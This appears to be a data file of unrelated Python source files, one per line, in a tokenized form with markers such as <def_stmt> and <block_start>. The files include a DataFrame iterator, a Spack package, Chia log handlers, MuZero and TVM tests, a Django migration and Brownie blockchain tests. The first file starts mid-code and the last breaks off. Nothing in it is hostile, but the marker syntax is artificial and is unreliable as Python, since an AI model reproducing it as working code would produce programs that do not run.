int)<block_start><return>tuple(self._data_as_list[i][key]<for>i range(len(self._data_as_list)))<block_end># access a column <elif_stmt>isinstance(key str)<block_start><return>self._data_as_dict[key]<block_end><block_end><def_stmt>__len__ self<block_start><return>self._len<block_end>@property<def_stmt>name self<arrow>str<block_start><return>self._name<block_end>@property<def_stmt>data self<arrow>List[Array]<block_start><return>self._data_as_list<block_end><def_stmt>iter self<arrow>Iterable[Tuple[Any <ellipsis>]]<block_start>""" Iterate over DataFrame rows as tuples. """<line_sep><return>DFIterator(self)<block_end><def_stmt>seal self<block_start><with_stmt>self._lock<block_start>self._sealed=<true><block_end><block_end><def_stmt>is_sealed self<arrow>bool<block_start><with_stmt>self._lock<block_start><return>self._sealed<block_end><block_end><def_stmt>_from_tuples self data columns# check tuple length <block_start>tuple_lengths=set(len(i)<for>i data)<if_stmt>len(tuple_lengths)<eq>1<block_start>tuple_length=tuple_lengths.pop()<block_end><else_stmt><block_start><raise>ValueError('can not construct DataFrame from unequal-length tuples')<block_end># check columns length <if_stmt>columns<and>len(columns)<ne>tuple_length<block_start><raise>ValueError('length of columns is not equal to the length of tuple')<block_end># create arrays <if_stmt>columns<block_start>self._data_as_list=[Array(name=columns[i])<for>i range(tuple_length)]<line_sep>self._data_as_dict={columns[i]:self._data_as_list[i]<for>i range(tuple_length)}<block_end><else_stmt><block_start>self._data_as_list=[Array()]<times>tuple_length<line_sep>self._data_as_dict=<none><block_end># tuples to arrays <for_stmt>row data<block_start><for_stmt>i,element enumerate(row)<block_start>self._data_as_list[i].put(element)<block_end><block_end>self._len=len(data)<block_end><def_stmt>_from_arrays self data columns# check array length <block_start>array_lengths=set(len(array)<for>array data)<if_stmt>len(array_lengths)<ne>1<block_start><raise>ValueError('arrays in data should have equal length')<block_end>self._len=array_lengths.pop()<line_sep># check columns length <if_stmt>columns<and>len(columns)<ne>len(data)<block_start><raise>ValueError('length of columns is not equal to the number of arrays')<block_end>self._data_as_list=data<if_stmt>columns<block_start>self._data_as_dict={columns[i]:self._data_as_list[i]<for>i range(len(data))}<block_end><else_stmt><block_start>self._data_as_dict=<none><block_end><block_end><def_stmt>_from_dict self data# check dict values <block_start><for_stmt>value data.values()<block_start><if_stmt><not>isinstance(value Array)<block_start><raise>ValueError('value type in data should be towhee.Array')<block_end><block_end># check arrays length array_lengths=set(len(array)<for>array data.values())<if_stmt>len(array_lengths)<ne>1<block_start><raise>ValueError('arrays in data should have equal length')<block_end>self._len=array_lengths.pop()<line_sep>self._data_as_list=list(data.values())<line_sep>self._data_as_dict=data<block_end><block_end><class_stmt>DFIterator<block_start>""" A row-based `DataFrame` iterator. """<def_stmt>__init__ self df:DataFrame<block_start>self._df=df<line_sep>self._offset=0<block_end><def_stmt>__iter__ self<block_start><return>self<block_end><def_stmt>__next__ self<block_start>""" Returns: (`Tuple[Any, ...]`) In the normal case, the iterator will return a `Tuple` at each call. (`None`) In the case that the `DataFrame` is not sealed and the new rows are not ready yet, the iterator will return `None`. The caller should determine whether to block the iteration or exit the loop. Raises: (`StopIteration`) The iteration end iff the `DataFrame` is sealed and the last row is reached. """<if_stmt>len(self._df)<eq>self._offset<block_start><if_stmt>self._df.is_sealed()# Already reach the last row <block_start><raise>StopIteration<block_end><else_stmt># No more ready rows <block_start><return><none><block_end><block_end><else_stmt><block_start>row=self._df[self._offset]<line_sep>self._offset<augadd>1<line_sep><return>row<block_end><block_end><def_stmt>ack self<block_start>""" To notice the DataFrame that the iterated rows has been successfully processed. An acknowledgement (ack) will notice the `DataFrame`s that the rows already iterated over are no longer used, and can be deleted from the system. """<line_sep><pass><block_end><block_end>
<import_from_stmt>rpython.jit.metainterp.test.test_list ListTests<import_from_stmt>rpython.jit.backend.aarch64.test.test_basic JitAarch64Mixin<class_stmt>TestList(JitAarch64Mixin ListTests)# for individual tests see # ====> ../../../metainterp/test/test_list.py <block_start><pass><block_end>
# Copyright 2013-2021 Lawrence Livermore National Security, LLC and other # Spack Project Developers. See the top-level COPYRIGHT file for details. # # SPDX-License-Identifier: (Apache-2.0 OR MIT) <import_from_stmt>spack *<class_stmt>Pacparser(MakefilePackage)<block_start>"""pacparser is a library to parse proxy auto-config (PAC) files."""<line_sep>homepage="https://pacparser.github.io/"<line_sep>url="https://github.com/manugarg/pacparser/releases/download/1.3.7/pacparser-1.3.7.tar.gz"<line_sep>version('1.3.7' sha256='eb48ec2fc202d12a4b882133048c7590329849f32c2285bc4dbe418f29aad249')<line_sep>depends_on('python' when='+python')<line_sep>depends_on('py-setuptools' when='+python' type=('build' 'run'))<line_sep>variant('python' default=<false> description='Build and install python bindings')<def_stmt>build self spec prefix<block_start>make('-C' 'src')<if_stmt>'+python'<in>spec<block_start>make('-C' 'src' 'pymod')<block_end><block_end><def_stmt>install self spec prefix<block_start>make('-C' 'src' 'install' 'PREFIX='+self.prefix)<if_stmt>'+python'<in>spec<block_start>make('-C' 'src' 'install-pymod' 'PREFIX='+self.prefix 'EXTRA_ARGS=--prefix={0}'.format(prefix))<block_end><block_end><block_end>
<def_stmt>all_perms str<block_start><if_stmt>len(str)<le>1<block_start><yield>str<block_end><else_stmt><block_start><for_stmt>perm all_perms(str[1:])<block_start><for_stmt>i range(len(perm)+1)#nb str[0:1] works in both string and list contexts <block_start><yield>perm[:i]+str[0:1]+perm[i:]<block_end><block_end><block_end><block_end>
# std <import_from_stmt>typing Optional<line_sep># project <import_from_stmt>src.chia_log.handlers.daily_stats.stats_manager StatsManager<import_from_stmt>src.chia_log.handlers.harvester_activity_handler HarvesterActivityHandler<import_from_stmt>src.chia_log.handlers.partial_handler PartialHandler<import_from_stmt>src.chia_log.handlers.block_handler BlockHandler<import_from_stmt>src.chia_log.handlers.finished_signage_point_handler FinishedSignagePointHandler<import_from_stmt>src.chia_log.handlers.wallet_added_coin_handler WalletAddedCoinHandler<import_from_stmt>src.chia_log.log_consumer LogConsumerSubscriber LogConsumer<import_from_stmt>src.notifier.notify_manager NotifyManager<class_stmt>LogHandler(LogConsumerSubscriber)<block_start>"""This class holds a list of handlers that analyze specific parts of the logs and generate events that are consumed by the notifier (for user notifications). Data flow: LogConsumer -> LogHandler -> Notifier Three easy steps to extend monitoring functionality 1. Create a parser for a new part of the log stream 2. Create a handler for analysing the parsed information 3. Add the new handler to the list of handlers below """<def_stmt>__init__ self log_consumer:LogConsumer notify_manager:NotifyManager stats_manager:Optional[StatsManager]=<none><block_start>self._notify_manager=notify_manager<line_sep>self._stats_manager=stats_manager<line_sep>self._handlers=[HarvesterActivityHandler() PartialHandler() BlockHandler() FinishedSignagePointHandler() WalletAddedCoinHandler() ]<line_sep>log_consumer.subscribe(self)<block_end><def_stmt>consume_logs self logs:str<block_start><for_stmt>handler self._handlers<block_start>events=handler.handle(logs self._stats_manager)<line_sep>self._notify_manager.process_events(events)<block_end><block_end><block_end>
# coding=utf-8 # Copyright 2021 The Google Research Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Tests for muzero.core."""<import_stmt>tensorflow<as>tf<import_from_stmt>muzero core<class_stmt>CoreTest(tf.test.TestCase)<block_start><def_stmt>test_make_target self<block_start>num_unroll_steps=3<line_sep>td_steps=-1<line_sep>rewards=[1. 2. 3. 4.]<line_sep># Assume 4 different actions. policy_distributions=[[0.7 0.1 0.1 0.1] [0.1 0.7 0.1 0.1] [0.1 0.1 0.7 0.1] [0.1 0.1 0.1 0.7] ]<line_sep>discount=0.9<line_sep>target=core.Episode.make_target(state_index=0 num_unroll_steps=num_unroll_steps td_steps=td_steps rewards=rewards policy_distributions=policy_distributions discount=discount)<line_sep>self.assertEqual(core.Target(value_mask=(1. 1. 1. 1.) reward_mask=(0. 1. 1. 1.) policy_mask=(1. 1. 1. 1.) value=(rewards[0]+rewards[1]<times>discount+rewards[2]<times>discount<power>2+rewards[3]<times>discount<power>3 rewards[1]+rewards[2]<times>discount+rewards[3]<times>discount<power>2 rewards[2]+rewards[3]<times>discount rewards[3]) reward=(rewards[3] rewards[0] rewards[1] rewards[2]) visits=tuple(policy_distributions)) target)<line_sep>target=core.Episode.make_target(state_index=2 num_unroll_steps=num_unroll_steps td_steps=td_steps rewards=rewards policy_distributions=policy_distributions discount=discount)<line_sep>self.assertEqual(core.Target(value_mask=(1. 1. 1. 1.) reward_mask=(0. 1. 1. 0.) policy_mask=(1. 1. 0. 0.) value=(rewards[2]+rewards[3]<times>discount rewards[3] 0. 0.) reward=(rewards[1] rewards[2] rewards[3] 0.) visits=tuple(policy_distributions[2:]+[policy_distributions[0]]<times>2)) target)<block_end><def_stmt>test_encode_decode self<block_start>encoder=core.ValueEncoder(min_value=-2 max_value=2 num_steps=5 use_contractive_mapping=<false>)<line_sep>encoded=encoder.encode(tf.constant([-0.5 0.9 5.0]))<line_sep>self.assertAllClose([[0 0.5 0.5 0 0] [0 0 0.1 0.9 0] [0 0 0 0 1]] encoded)<line_sep>self.assertAllClose([-0.5 0.9 2.0] encoder.decode(encoded))<line_sep>encoder=core.ValueEncoder(min_value=-2 max_value=2 num_steps=5 use_contractive_mapping=<true>)<line_sep>encoded=encoder.encode(tf.constant([-0.5 0.9 5.0]))<line_sep># Scaling transformation with contractive mapping self.assertAllClose([[0 0.61 0.39 0 0] [0 0 0 0.97 0.03] [0 0 0 0 1]] encoded atol=0.01)<line_sep>self.assertAllClose([-0.5 0.9 2.0] encoder.decode(encoded) atol=0.001)<block_end><block_end><if_stmt>__name__<eq>'__main__'<block_start>tf.test.main()<block_end>
# MIT License # # Copyright (c) 2016 <NAME> aka kronenthaler # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in all # copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. # This is a backwards-compatibility file. For Unity developers this is the only file it needs to be added to the Unity # project. # This file will install the proper python package into the user's python's local space, if it's not present at run-time # of this script. Afterwards, it will import all necessary modules to the developer to make his/her own script work as # before. <import_from_stmt>setuptools setup<import_stmt>site<line_sep>__author__='kronenthaler'<line_sep>__version__='2.0.1'<line_sep>__package_name__='mod_pbxproj_installer'<try_stmt># check if file exists <block_start><import_from_stmt>pbxproj XcodeProject<block_end><except_stmt># install it if not present <block_start>print('Installing package...')<line_sep>setup(name=__package_name__ license='MIT License' install_requires=['pbxproj'] script_args=['install' '--user' '--force' '--record' '.uninstall_files'])<block_end># force the refresh of the packages reload(site)<line_sep># import publicly <import_from_stmt>pbxproj *<line_sep>
# -*- coding: utf-8 -*- # Generated by Django 1.11.4 on 2017-10-11 16:17 <import_from_future_stmt> unicode_literals<import_stmt>django.db.models.deletion<import_from_stmt>django.db migrations models<import_from_stmt>usaspending_api.common.helpers.generic_helper FY_PG_FUNCTION_DEF<class_stmt>Migration(migrations.Migration)<block_start>initial=<true><line_sep>dependencies=[('submissions' '0001_initial') ('references' '0001_initial') ]<line_sep>operations=[migrations.CreateModel(name='AppropriationAccountBalances' fields=[('data_source' models.TextField(choices=[('USA' 'USAspending') ('DBR' 'DATA Act Broker')] help_text='The source of this entry, either Data Broker (DBR) or USASpending (USA)' null=<true>)) ('appropriation_account_balances_id' models.AutoField(primary_key=<true> serialize=<false>)) ('budget_authority_unobligated_balance_brought_forward_fyb' models.DecimalField(blank=<true> decimal_places=2 max_digits=23 null=<true>)) ('adjustments_to_unobligated_balance_brought_forward_cpe' models.DecimalField(decimal_places=2 max_digits=23)) ('budget_authority_appropriated_amount_cpe' models.DecimalField(decimal_places=2 max_digits=23)) ('borrowing_authority_amount_total_cpe' models.DecimalField(blank=<true> decimal_places=2 max_digits=23 null=<true>)) ('contract_authority_amount_total_cpe' models.DecimalField(blank=<true> decimal_places=2 max_digits=23 null=<true>)) ('spending_authority_from_offsetting_collections_amount_cpe' models.DecimalField(blank=<true> decimal_places=2 max_digits=23 null=<true>)) ('other_budgetary_resources_amount_cpe' models.DecimalField(blank=<true> decimal_places=2 max_digits=23 null=<true>)) ('total_budgetary_resources_amount_cpe' models.DecimalField(decimal_places=2 max_digits=23)) ('gross_outlay_amount_by_tas_cpe' models.DecimalField(decimal_places=2 max_digits=23)) ('deobligations_recoveries_refunds_by_tas_cpe' models.DecimalField(decimal_places=2 max_digits=23)) ('unobligated_balance_cpe' models.DecimalField(decimal_places=2 max_digits=23)) ('status_of_budgetary_resources_total_cpe' models.DecimalField(decimal_places=2 max_digits=23)) ('obligations_incurred_total_by_tas_cpe' models.DecimalField(decimal_places=2 max_digits=23)) ('drv_appropriation_availability_period_start_date' models.DateField(blank=<true> null=<true>)) ('drv_appropriation_availability_period_end_date' models.DateField(blank=<true> null=<true>)) ('drv_appropriation_account_expired_status' models.TextField(blank=<true> null=<true>)) ('drv_obligations_unpaid_amount' models.DecimalField(blank=<true> decimal_places=2 max_digits=23 null=<true>)) ('drv_other_obligated_amount' models.DecimalField(blank=<true> decimal_places=2 max_digits=23 null=<true>)) ('reporting_period_start' models.DateField(blank=<true> null=<true>)) ('reporting_period_end' models.DateField(blank=<true> null=<true>)) ('last_modified_date' models.DateField(blank=<true> null=<true>)) ('certified_date' models.DateField(blank=<true> null=<true>)) ('create_date' models.DateTimeField(auto_now_add=<true> null=<true>)) ('update_date' models.DateTimeField(auto_now=<true> null=<true>)) ('final_of_fy' models.BooleanField(db_index=<true> default=<false>)) ('submission' models.ForeignKey(on_delete=django.db.models.deletion.CASCADE to='submissions.SubmissionAttributes')) ] options={'db_table':'appropriation_account_balances' 'managed':<true> } ) migrations.CreateModel(name='AppropriationAccountBalancesQuarterly' fields=[('id' models.AutoField(auto_created=<true> primary_key=<true> serialize=<false> verbose_name='ID')) ('data_source' models.TextField(choices=[('USA' 'USAspending') ('DBR' 'DATA Act Broker')] help_text='The source of this entry, either Data Broker (DBR) or USASpending (USA)' null=<true>)) ('budget_authority_unobligated_balance_brought_forward_fyb' models.DecimalField(blank=<true> decimal_places=2 max_digits=23 null=<true>)) ('adjustments_to_unobligated_balance_brought_forward_cpe' models.DecimalField(decimal_places=2 max_digits=23)) ('budget_authority_appropriated_amount_cpe' models.DecimalField(decimal_places=2 max_digits=23)) ('borrowing_authority_amount_total_cpe' models.DecimalField(blank=<true> decimal_places=2 max_digits=23 null=<true>)) ('contract_authority_amount_total_cpe' models.DecimalField(blank=<true> decimal_places=2 max_digits=23 null=<true>)) ('spending_authority_from_offsetting_collections_amount_cpe' models.DecimalField(blank=<true> decimal_places=2 max_digits=23 null=<true>)) ('other_budgetary_resources_amount_cpe' models.DecimalField(blank=<true> decimal_places=2 max_digits=23 null=<true>)) ('total_budgetary_resources_amount_cpe' models.DecimalField(decimal_places=2 max_digits=23)) ('gross_outlay_amount_by_tas_cpe' models.DecimalField(decimal_places=2 max_digits=23)) ('deobligations_recoveries_refunds_by_tas_cpe' models.DecimalField(decimal_places=2 max_digits=23)) ('unobligated_balance_cpe' models.DecimalField(decimal_places=2 max_digits=23)) ('status_of_budgetary_resources_total_cpe' models.DecimalField(decimal_places=2 max_digits=23)) ('obligations_incurred_total_by_tas_cpe' models.DecimalField(decimal_places=2 max_digits=23)) ('create_date' models.DateTimeField(auto_now_add=<true> null=<true>)) ('update_date' models.DateTimeField(auto_now=<true> null=<true>)) ('submission' models.ForeignKey(on_delete=django.db.models.deletion.CASCADE to='submissions.SubmissionAttributes')) ] options={'db_table':'appropriation_account_balances_quarterly' 'managed':<true> } ) migrations.CreateModel(name='BudgetAuthority' fields=[('id' models.AutoField(auto_created=<true> primary_key=<true> serialize=<false> verbose_name='ID')) ('agency_identifier' models.TextField(db_index=<true>)) ('fr_entity_code' models.TextField(db_index=<true> null=<true>)) ('year' models.IntegerField()) ('amount' models.BigIntegerField(null=<true>)) ] options={'db_table':'budget_authority' } ) migrations.CreateModel(name='FederalAccount' fields=[('id' models.AutoField(auto_created=<true> primary_key=<true> serialize=<false> verbose_name='ID')) ('agency_identifier' models.TextField(db_index=<true>)) ('main_account_code' models.TextField(db_index=<true>)) ('account_title' models.TextField()) ('federal_account_code' models.TextField(null=<true>)) ] options={'db_table':'federal_account' 'managed':<true> } ) migrations.CreateModel(name='TreasuryAppropriationAccount' fields=[('data_source' models.TextField(choices=[('USA' 'USAspending') ('DBR' 'DATA Act Broker')] help_text='The source of this entry, either Data Broker (DBR) or USASpending (USA)' null=<true>)) ('treasury_account_identifier' models.AutoField(primary_key=<true> serialize=<false>)) ('tas_rendering_label' models.TextField(blank=<true> null=<true>)) ('allocation_transfer_agency_id' models.TextField(blank=<true> null=<true>)) ('agency_id' models.TextField()) ('beginning_period_of_availability' models.TextField(blank=<true> null=<true>)) ('ending_period_of_availability' models.TextField(blank=<true> null=<true>)) ('availability_type_code' models.TextField(blank=<true> null=<true>)) ('availability_type_code_description' models.TextField(blank=<true> null=<true>)) ('main_account_code' models.TextField()) ('sub_account_code' models.TextField()) ('account_title' models.TextField(blank=<true> null=<true>)) ('reporting_agency_id' models.TextField(blank=<true> null=<true>)) ('reporting_agency_name' models.TextField(blank=<true> null=<true>)) ('budget_bureau_code' models.TextField(blank=<true> null=<true>)) ('budget_bureau_name' models.TextField(blank=<true> null=<true>)) ('fr_entity_code' models.TextField(blank=<true> null=<true>)) ('fr_entity_description' models.TextField(blank=<true> null=<true>)) ('budget_function_code' models.TextField(blank=<true> null=<true>)) ('budget_function_title' models.TextField(blank=<true> null=<true>)) ('budget_subfunction_code' models.TextField(blank=<true> null=<true>)) ('budget_subfunction_title' models.TextField(blank=<true> null=<true>)) ('drv_appropriation_availability_period_start_date' models.DateField(blank=<true> null=<true>)) ('drv_appropriation_availability_period_end_date' models.DateField(blank=<true> null=<true>)) ('drv_appropriation_account_expired_status' models.TextField(blank=<true> null=<true>)) ('create_date' models.DateTimeField(auto_now_add=<true> null=<true>)) ('update_date' models.DateTimeField(auto_now=<true> null=<true>)) ('internal_start_date' models.DateField(blank=<true> null=<true>)) ('internal_end_date' models.DateField(blank=<true> null=<true>)) ('awarding_toptier_agency' models.ForeignKey(help_text='The toptier agency object associated with the ATA' null=<true> on_delete=django.db.models.deletion.DO_NOTHING related_name='tas_ata' to='references.ToptierAgency')) ('federal_account' models.ForeignKey(null=<true> on_delete=django.db.models.deletion.DO_NOTHING to='accounts.FederalAccount')) ('funding_toptier_agency' models.ForeignKey(help_text='The toptier agency object associated with the AID' null=<true> on_delete=django.db.models.deletion.DO_NOTHING related_name='tas_aid' to='references.ToptierAgency')) ] options={'db_table':'treasury_appropriation_account' 'managed':<true> } ) migrations.AlterUniqueTogether(name='federalaccount' unique_together=set([('agency_identifier' 'main_account_code')]) ) migrations.AlterUniqueTogether(name='budgetauthority' unique_together=set([('agency_identifier' 'fr_entity_code' 'year')]) ) migrations.AddField(model_name='appropriationaccountbalancesquarterly' name='treasury_account_identifier' field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE to='accounts.TreasuryAppropriationAccount') ) migrations.AddField(model_name='appropriationaccountbalances' name='treasury_account_identifier' field=models.ForeignKey(db_column='treasury_account_identifier' on_delete=django.db.models.deletion.CASCADE related_name='account_balances' to='accounts.TreasuryAppropriationAccount') ) migrations.RunSQL(sql=[FY_PG_FUNCTION_DEF]) ]<block_end>
<import_from_stmt>coapthon.resources.resource Resource<line_sep>__author__='<NAME>'<class_stmt>RemoteResource(Resource)<block_start><def_stmt>__init__ self name remote_server remote_path coap_server=<none> visible=<true> observable=<true> allow_children=<true><block_start>super(RemoteResource self).__init__(name coap_server visible=visible observable=observable allow_children=allow_children)<line_sep>self.remote_path=remote_path<line_sep>self.remote_server=remote_server<block_end><block_end>
# Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. <import_stmt>tvm<def_stmt>test_vectorize_loop <block_start>dtype='int64'<line_sep>n=tvm.var('n')<line_sep>ib=tvm.ir_builder.create()<line_sep>A=ib.pointer("float32" name="A")<with_stmt>ib.for_range(0 n)<as>i<block_start><with_stmt>ib.for_range(0 4 for_type="vectorize")<as>j<block_start>A[j]=tvm.const(1 A.dtype)<block_end><block_end>stmt=ib.get()<assert_stmt>isinstance(stmt.body tvm.stmt.For)<line_sep>stmt=tvm.ir_pass.VectorizeLoop(stmt)<assert_stmt>isinstance(stmt tvm.stmt.For)<assert_stmt><not>isinstance(stmt.body tvm.stmt.For)<assert_stmt>isinstance(stmt.body.index tvm.expr.Ramp)<assert_stmt>isinstance(stmt.body.value tvm.expr.Broadcast)<block_end><def_stmt>test_vectorize_vector <block_start>dtype='int64'<line_sep>n=tvm.var('n')<line_sep>ib=tvm.ir_builder.create()<line_sep>A=ib.pointer("float32x4" name="A")<with_stmt>ib.for_range(0 n)<as>i<block_start><with_stmt>ib.for_range(0 4 for_type="vectorize")<as>j<block_start>A[j]=tvm.const(1 A.dtype)<block_end><block_end>stmt=ib.get()<assert_stmt>isinstance(stmt.body tvm.stmt.For)<line_sep>stmt=tvm.ir_pass.VectorizeLoop(stmt)<assert_stmt>isinstance(stmt tvm.stmt.For)<assert_stmt><not>isinstance(stmt.body tvm.stmt.For)<assert_stmt>isinstance(stmt.body.index tvm.expr.Ramp)<assert_stmt>isinstance(stmt.body.value tvm.expr.Broadcast)<block_end><def_stmt>test_vectorize_with_if <block_start>n=tvm.var('n')<line_sep>x=tvm.var('x')<line_sep>ib=tvm.ir_builder.create()<line_sep>A=ib.pointer("float32" name="A")<with_stmt>ib.for_range(0 4 for_type="vectorize")<as>i<block_start><with_stmt>ib.if_scope(x<l>n)<block_start>A[i]=A[i]+1<block_end><with_stmt>ib.else_scope()<block_start><with_stmt>ib.if_scope(i<l>n)<block_start>A[i]=2.0<block_end><block_end><block_end>stmt=ib.get()<line_sep>stmt=tvm.ir_pass.VectorizeLoop(stmt)<assert_stmt>isinstance(stmt tvm.stmt.IfThenElse)<assert_stmt>isinstance(stmt.then_case.index tvm.expr.Ramp)<assert_stmt>isinstance(stmt.then_case.value tvm.expr.Add)<assert_stmt>stmt.then_case.value.dtype<eq>"float32x4"<assert_stmt>isinstance(stmt.else_case tvm.stmt.For)<block_end><def_stmt>test_vectorize_with_le_cond <block_start>n=tvm.var('n')<line_sep>ib=tvm.ir_builder.create()<line_sep>A=ib.pointer("float32" name="A")<with_stmt>ib.for_range(0 4 for_type="vectorize")<as>i<block_start><with_stmt>ib.if_scope(i<le>n)<block_start>A[i]=A[i]+1<block_end><block_end>stmt=ib.get()<line_sep>stmt=tvm.ir_pass.VectorizeLoop(stmt)<assert_stmt>isinstance(stmt tvm.stmt.For)<block_end><def_stmt>test_vectorize_with_ge_cond <block_start>n=tvm.var('n')<line_sep>ib=tvm.ir_builder.create()<line_sep>A=ib.pointer("float32" name="A")<with_stmt>ib.for_range(0 4 for_type="vectorize")<as>i<block_start><with_stmt>ib.if_scope(i<ge>n)<block_start>A[i]=A[i]+1<block_end><block_end>stmt=ib.get()<line_sep>stmt=tvm.ir_pass.VectorizeLoop(stmt)<assert_stmt>isinstance(stmt tvm.stmt.For)<block_end><def_stmt>test_vectorize_if_then_else <block_start>n=tvm.var('n')<line_sep>x=tvm.var('x')<line_sep>ib=tvm.ir_builder.create()<line_sep>A=ib.pointer("float32" name="A")<with_stmt>ib.for_range(0 4 for_type="vectorize")<as>i<block_start>A[i]=tvm.call_intrin("float32" "tvm_if_then_else" i<g>0 A[i]+1 A[i])<block_end>stmt=ib.get()<line_sep>stmt=tvm.ir_pass.VectorizeLoop(stmt)<assert_stmt>isinstance(stmt tvm.stmt.For)<line_sep>ib=tvm.ir_builder.create()<line_sep>A=ib.pointer("float32" name="A")<with_stmt>ib.for_range(0 n)<as>k<block_start><with_stmt>ib.for_range(0 4 for_type="vectorize")<as>i<block_start>A[k<times>4+i]=tvm.call_intrin("float32" "tvm_if_then_else" k<g>0 A[k<times>4+i] 0)<block_end><block_end>stmt=ib.get()<assert_stmt>isinstance(stmt.body tvm.stmt.For)<line_sep>stmt=tvm.ir_pass.VectorizeLoop(stmt)<assert_stmt><not>isinstance(stmt.body tvm.stmt.For)<assert_stmt>isinstance(stmt.body.value.args[2] tvm.expr.Broadcast)<block_end><if_stmt>__name__<eq>"__main__"<block_start>test_vectorize_vector()<line_sep>test_vectorize_with_if()<line_sep>test_vectorize_loop()<line_sep>test_vectorize_if_then_else()<line_sep>test_vectorize_with_le_cond()<line_sep>test_vectorize_with_ge_cond()<block_end>
<import_from_stmt>js_reimpl_common run_op_chapter1_chapter2<def_stmt>run_op keys op **kwargs<block_start><return>run_op_chapter1_chapter2("chapter1" <none> keys op **kwargs)<block_end><def_stmt>create_new numbers<block_start><return>run_op(<none> "create_new" array=numbers)<block_end><def_stmt>create_new_broken numbers<block_start><return>run_op(<none> "create_new_broken" array=numbers)<block_end><def_stmt>has_key keys key<block_start><return>run_op(keys "has_key" key=key)<block_end><def_stmt>linear_search numbers key<block_start><return>run_op(<none> "linear_search" key=key array=numbers)<block_end>
"""Effect decorator for Noisemaker Composer Presets"""<import_stmt>inspect<line_sep>EFFECTS={}<def_stmt>effect *args<block_start>"""Function decorator for declaring composable effects."""<def_stmt>decorator_fn func<block_start>argspec=inspect.getfullargspec(func)<line_sep>params=argspec.args<for_stmt>param ["time" "speed"]<block_start><if_stmt>param<not><in>params<block_start><raise>ValueError(f'{func.__name__}() needs to accept a "{param}" keyword arg. Please add it to the function signature.')<block_end><block_end># All effects respond to "tensor", "shape". Removing these non-keyword args should make params the same length as defaults. params.remove("tensor")<line_sep>params.remove("shape")<if_stmt>params<and>len(params)<ne>len(argspec.defaults)<block_start><raise>ValueError(f'Expected {len(argspec.defaults)} keyword params to "{func.__name__}", but got {len(params)}.')<block_end># Register effect name and params name=args[0]<if>args<else>func.__name__<line_sep>EFFECTS[name]=dict((params[i] argspec.defaults[i])<for>i range(len(params)))<line_sep>EFFECTS[name]["func"]=func<line_sep><return>func<block_end><return>decorator_fn<block_end>
<import_stmt>threading<import_stmt>time<import_stmt>pytest<import_stmt>brownie<def_stmt>send_and_wait_for_tx <block_start>tx=brownie.accounts[0].transfer(brownie.accounts[1] "0.1 ether" required_confs=0 silent=<true>)<line_sep>tx.wait(2)<assert_stmt>tx.confirmations<ge>2<assert_stmt>tx.status<eq>1<block_end>@pytest.fixture<def_stmt>block_time_network devnetwork config network_name<block_start>"""Provide a network with fixed block mining time of 1 second."""<line_sep>config.networks[network_name]["cmd_settings"]["block_time"]=1<line_sep>devnetwork.disconnect()<line_sep>devnetwork.connect(network_name)<line_sep><yield>devnetwork<line_sep>devnetwork.disconnect()<block_end><def_stmt>test_required_confirmations_deploy accounts BrownieTester block_time_network web3<block_start>block=web3.eth.block_number<line_sep>accounts[0].deploy(BrownieTester <true> required_confs=3)<assert_stmt>web3.eth.block_number-block<ge>3<block_end><def_stmt>test_required_confirmations_transfer accounts block_time_network web3<block_start>block=web3.eth.block_number<line_sep>tx=accounts[0].transfer(accounts[1] "1 ether" required_confs=3)<assert_stmt>tx.confirmations<ge>3<assert_stmt>web3.eth.block_number-block<ge>3<block_end><def_stmt>test_required_confirmations_transact accounts BrownieTester block_time_network web3<block_start>block=web3.eth.block_number<line_sep>brownieTester=BrownieTester.deploy(<true> {"from":accounts[0] "required_confs":2})<assert_stmt>web3.eth.block_number-block<ge>2<line_sep>block=web3.eth.block_number<line_sep>tx=brownieTester.doNothing({"from":accounts[0] "required_confs":4})<assert_stmt>tx.confirmations<ge>4<assert_stmt>web3.eth.block_number-block<ge>4<block_end><def_stmt>test_required_confirmations_zero accounts block_time_network web3<block_start>block=web3.eth.block_number<line_sep>tx=accounts[0].transfer(accounts[1] "1 ether" required_confs=0)<assert_stmt>tx.status<eq>-1<assert_stmt>web3.eth.block_number-block<eq>0<line_sep>time.sleep(1.5)<assert_stmt>tx.status<eq>1<assert_stmt>tx.confirmations<ge>1<block_end><def_stmt>test_wait_for_confirmations accounts block_time_network<block_start>tx=accounts[0].transfer(accounts[1] "1 ether" required_confs=1)<line_sep>tx.wait(3)<assert_stmt>tx.confirmations<in>[3 4]<line_sep>tx.wait(2)<line_sep>tx.wait(5)<assert_stmt>tx.confirmations<ge>5<block_end><def_stmt>test_pending_nonce accounts block_time_network<block_start><for_stmt>_ range(3)<block_start>accounts[0].transfer(accounts[1] "0.1 ether" required_confs=0 